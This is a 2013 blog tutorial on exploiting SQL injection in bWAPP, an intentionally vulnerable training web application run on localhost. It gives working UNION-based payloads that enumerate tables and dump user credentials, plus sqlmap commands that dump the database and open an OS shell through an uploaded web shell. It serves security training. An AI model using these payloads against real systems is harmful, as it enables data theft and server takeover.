Monday, January 21, 2013

bWAPP - SQL injection

Is bWAPP vulnerable for SQL injection? Yes of course. This is the purpose of bWAPP, our extremely buggy web application. It has some nice injection issues... I made them intentionally, remember?

No... I will not explain in detail what SQL injection is!
A SQL injection attack is probably the easiest attack to prevent, while being one of the least protected against forms of attack. The core of the attack is that a SQL command is appended to the back end, usually through of a form field in the website or web application, with the intent of breaking the original SQL statement and then running the SQL statement that was injected into the form field. I'm sure you can find enough tutorials on the Internet about SQL injection. Here's an example of a pretty nice article.

Yes... I will explain how to exploit bWAPP using SQL injection and how to take ownership of the  database and even the underlying operating system. Definitely!



Currently there are 5 bugs in bWAPP related to SQL injection:
  • the Search page,

    where you can search for a movie(s) using a search string. The movie(s) details will be displayed as a result of your search.
     
  • the Select page,
     
    where you can select a specific movie from a drop-down list.
     
  • the Login page,

    where you can enter your credentials to login.
     
  • the Blind SQL injection page,

    where you also can search for a movie. The application will tell you if the movie exists or not. You will not see the movie details... maybe that's the reason why I called this the Blind SQL injection page :)
     
  • and where is bug number 5?

    A little challenge for you... somewhere in the application there is an issue with a SQL insertion. It's up to you to tell us where. Please give us your feedback @MME_IT.



The Search page

Here you can search for a movie(s) using a search string. The movie(s) details will be displayed as a result of your search. If you click the search button without entering any search string then all movies will be displayed.



The injection symptoms: when entering a single quote (') in the title field we receive the following message:

'Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1'

I love that message!

Here we go for some basic SQL injection fun:

blah' or 1=1--

results in all the records:



blah' or 1=2--

results in 0 records:



So the URL parameter title is definitely susceptible to SQL injection:

http://localhost/bWAPP/sqli_1.php?title=blah'+or+1=1--%20&action=search


What's next? Do you want to view some data not intended for you? I mean some real confidential information! Of course you want, let's go...

You could use the SQL union statement to merge database tables.
First of all you need to ensure that you use the same number of columns as the original SQL statement when using the SQL union statement!

blah' union select 1--

results in the following message:




After a while you will discover that you should use 6 columns:

 
blah' union select 1,1,1,1,1,1--

results in:



And that's great!
Now we can play with the field order and visualize the current database version:

blah' union select 1,DATABASE(),1,1,1,1-- 



We have found the name the of the current database name: bWAPP

Now our mission is to retrieve the table names of the current database:


blah' union select 1,table_name,1,1,1,1 from INFORMATION_SCHEMA.TABLES where table_schema=database()--



We have 3 tables: blog, movies and users. I think we should go for the data in the table users :)

We want to retrieve the column names for the table users:

blah' union select 1,column_name,1,1,1,1 from INFORMATION_SCHEMA.COLUMNS where table_name='users' and table_schema=database()--



The column names login, password, email and secret look interesting. We want those values!

blah' union select 1,login,password,email,secret,1 from users--



OK, we have the values! We exploited the underlying database by retrieving some confidential data. Apparently it seems that the password value is stored in a hashed state and cannot be retrieved. Those guys from MME are doing a great job...

After 10 seconds, 1 password was already cracked using John :p



Of course, we knew that the password for user bee was bug. I'm just trying to convince you to use complex passwords!

Let's summarize, we retrieved some data that was not intended for us. We retrieved the password hashes and we cracked a password. What's next?

Right... we will takeover the database and the underlying operating system. One of my favorite tools for doing that is sqlmap.

sqlmap is an open source pentesting tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections (source: sqlmap.org). It is written in python.



We can automate the previous commands with sqlmap.

This dumps the current database version and the database names:

./sqlmap.py -u "http://localhost/bWAPP/sqli_1.php?title=&action=search" 
--cookie="PHPSESSID=pj2jl00ha6s5vrfaldgdcd7dt1;security_level=0" --dbs




This dumps the table fields, it even cracks automatically the passwords:

./sqlmap.py -u "http://localhost/bWAPP/sqli_1.php?title=&action=search" --cookie="PHPSESSID=pj2jl00ha6s5vrfaldgdcd7dt1;security_level=0"
-D bWAPP -T users -C login,email,password,secret --dump



Using sqlmap we also have the possibility to create a shell with the underlying operating system. Actually the tool will upload a web shell that runs your favorite OS commands. A very nice and powerful tool. Thank you Bernardo and Miroslav!

./sqlmap.py -u "http://localhost/bWAPP/sqli_1.php?title=&action=search" --cookie="PHPSESSID=pj2jl00ha6s5vrfaldgdcd7dt1;security_level=0" --os-shell



Conclusion

SQL injection can have disastrous consequences, no doubt about it.

Feel free to test for SQL injection vulnerabilities using the bWAPP web application. As you know there are 5 different bugs related to SQL injection. You can download bWAPP from here. Don't forget to set the security level to low or medium. With security level high you will notice that SQL injection is no longer applicable. With security level high we are validating every user input. This is done with the MySQL real escape string function and with prepared statements.

If you want to know more about SQL injection and tools like sqlmap, don't hesitate to subscribe for our ITSEC training. Or just invite me to your security event. It would be an honor for me to speak at your event!

Regards

Malik